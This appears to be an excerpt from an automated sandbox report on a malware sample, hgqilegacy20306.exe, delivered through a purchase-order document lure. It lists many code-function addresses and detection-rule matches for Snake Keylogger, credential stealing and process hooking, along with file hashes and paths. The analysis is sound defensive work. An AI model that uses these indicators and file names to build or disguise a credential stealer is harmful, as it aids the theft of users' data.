                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F72D88_2_005F72D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FC0D88_2_005FC0D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F44D88_2_005F44D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F1BD08_2_005F1BD0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F95D08_2_005F95D0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F5BD08_2_005F5BD0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FEBCF8_2_005FEBCF
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F72C98_2_005F72C9
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F32C88_2_005F32C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FD8C08_2_005FD8C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F95C08_2_005F95C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F90FC8_2_005F90FC
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FD3F88_2_005FD3F8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F0DF88_2_005F0DF8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F7BF88_2_005F7BF8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FA8F08_2_005FA8F0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F44E88_2_005F44E8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FD3E88_2_005FD3E8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F5BE08_2_005F5BE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FEBE08_2_005FEBE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FA8E08_2_005FA8E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F699A8_2_005F699A
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F29988_2_005F2998
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F9A988_2_005F9A98
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FF0988_2_005FF098
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FC5908_2_005FC590
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F9A8C8_2_005F9A8C
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FDD888_2_005FDD88
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F49808_2_005F4980
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FB2808_2_005FB280
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F3BB88_2_005F3BB8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FADB88_2_005FADB8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F52B08_2_005F52B0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FD8AF8_2_005FD8AF
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F3BA98_2_005F3BA9
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F69A88_2_005F69A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FF0A88_2_005FF0A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FADA88_2_005FADA8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F52A18_2_005F52A1
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005F12A08_2_005F12A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_005FC5A08_2_005FC5A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061A1208_2_0061A120
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061C0608_2_0061C060
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061F2608_2_0061F260
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061D6408_2_0061D640
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061A4408_2_0061A440
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006100408_2_00610040
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061BA208_2_0061BA20
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061EC208_2_0061EC20
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006118288_2_00611828
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061D0008_2_0061D000
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006130108_2_00613010
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006100128_2_00610012
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061CCE08_2_0061CCE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00611CF08_2_00611CF0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006104F88_2_006104F8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061E2C08_2_0061E2C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061B0C08_2_0061B0C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006134D88_2_006134D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061C6A08_2_0061C6A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061F8A08_2_0061F8A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061AA808_2_0061AA80
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006126808_2_00612680
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061DC808_2_0061DC80
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00610E878_2_00610E87
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00610E988_2_00610E98
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061A7608_2_0061A760
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006113608_2_00611360
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061D9608_2_0061D960
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061BD408_2_0061BD40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061EF408_2_0061EF40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00612B488_2_00612B48
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061A7508_2_0061A750
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061D3208_2_0061D320
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061B7008_2_0061B700
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061E9008_2_0061E900
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006105088_2_00610508
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061E5E08_2_0061E5E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061B3E08_2_0061B3E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061C9C08_2_0061C9C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061FBC08_2_0061FBC0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006109C28_2_006109C2
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006109D08_2_006109D0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061ADA08_2_0061ADA0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006139A08_2_006139A0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061DFA08_2_0061DFA0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006121B88_2_006121B8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061C3808_2_0061C380
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0061F5808_2_0061F580
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006700408_2_00670040
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067B7608_2_0067B760
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00673D698_2_00673D69
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067AA688_2_0067AA68
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067C4688_2_0067C468
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067B7708_2_0067B770
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006730708_2_00673070
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00674A708_2_00674A70
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00673D788_2_00673D78
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067C4788_2_0067C478
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067E9788_2_0067E978
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006757788_2_00675778
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067DE788_2_0067DE78
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067F7408_2_0067F740
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00676D408_2_00676D40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00677A408_2_00677A40
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006787408_2_00678740
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00677A488_2_00677A48
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006794488_2_00679448
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006787508_2_00678750
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067305F8_2_0067305F
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067AA598_2_0067AA59
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006794588_2_00679458
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067C0208_2_0067C020
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006739208_2_00673920
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006753208_2_00675320
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067CD288_2_0067CD28
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006746288_2_00674628
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006760288_2_00676028
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006753308_2_00675330
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067DA308_2_0067DA30
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00676D308_2_00676D30
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067F7308_2_0067F730
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006760388_2_00676038
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006790008_2_00679000
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00679D088_2_00679D08
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067B3088_2_0067B308
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006700128_2_00670012
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067EE108_2_0067EE10
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006739108_2_00673910
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067C0108_2_0067C010
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067461C8_2_0067461C
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067B3188_2_0067B318
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00675BE08_2_00675BE0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067E4E08_2_0067E4E0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006768E88_2_006768E8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006782F68_2_006782F6
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006775F08_2_006775F0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00678FF08_2_00678FF0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006782F88_2_006782F8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067C8C18_2_0067C8C1
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067AEC08_2_0067AEC0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006741C08_2_006741C0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067BBC88_2_0067BBC8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006734C88_2_006734C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00675BD48_2_00675BD4
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067C8D08_2_0067C8D0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006741D08_2_006741D0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00674ED08_2_00674ED0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006768DC8_2_006768DC
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00674ED88_2_00674ED8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067D5D88_2_0067D5D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067FBD88_2_0067FBD8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006798A28_2_006798A2
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00677EA08_2_00677EA0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067F2A88_2_0067F2A8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00678BA88_2_00678BA8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006798B08_2_006798B0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067AEB08_2_0067AEB0
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006734B98_2_006734B9
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067BBB88_2_0067BBB8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067D1808_2_0067D180
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00674A808_2_00674A80
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006764808_2_00676480
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006757888_2_00675788
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_0067DE888_2_0067DE88
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006771888_2_00677188
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006764908_2_00676490
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00677E9E8_2_00677E9E
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006771988_2_00677198
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_00678B988_2_00678B98
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E2E788_2_006E2E78
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E00408_2_006E0040
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E3C388_2_006E3C38
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E50D88_2_006E50D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E35588_2_006E3558
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E99288_2_006E9928
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E43188_2_006E4318
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E49F88_2_006E49F8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006EB5C18_2_006EB5C1
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E57B88_2_006E57B8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E2E688_2_006E2E68
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E3C288_2_006E3C28
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006EA0188_2_006EA018
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E2AF48_2_006E2AF4
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E50C88_2_006E50C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E0ED88_2_006E0ED8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E354A8_2_006E354A
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E21218_2_006E2121
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E21308_2_006E2130
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E43088_2_006E4308
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E2B008_2_006E2B00
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E49E98_2_006E49E9
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E83C88_2_006E83C8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E83D88_2_006E83D8
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeCode function: 8_2_006E57A88_2_006E57A8
                Source: Thyssenkrupp PO040232.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.hgqilegacy20306.exe.3415480.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.hgqilegacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.916697876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.406561103.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: hgqilegacy20306.exe PID: 3416, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: hgqilegacy20306.exe PID: 3508, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: XcsQpLjhNNvxYtrw[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: hgqilegacy20306.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.hgqilegacy20306.exe.3279d40.6.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.hgqilegacy20306.exe.3415480.7.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
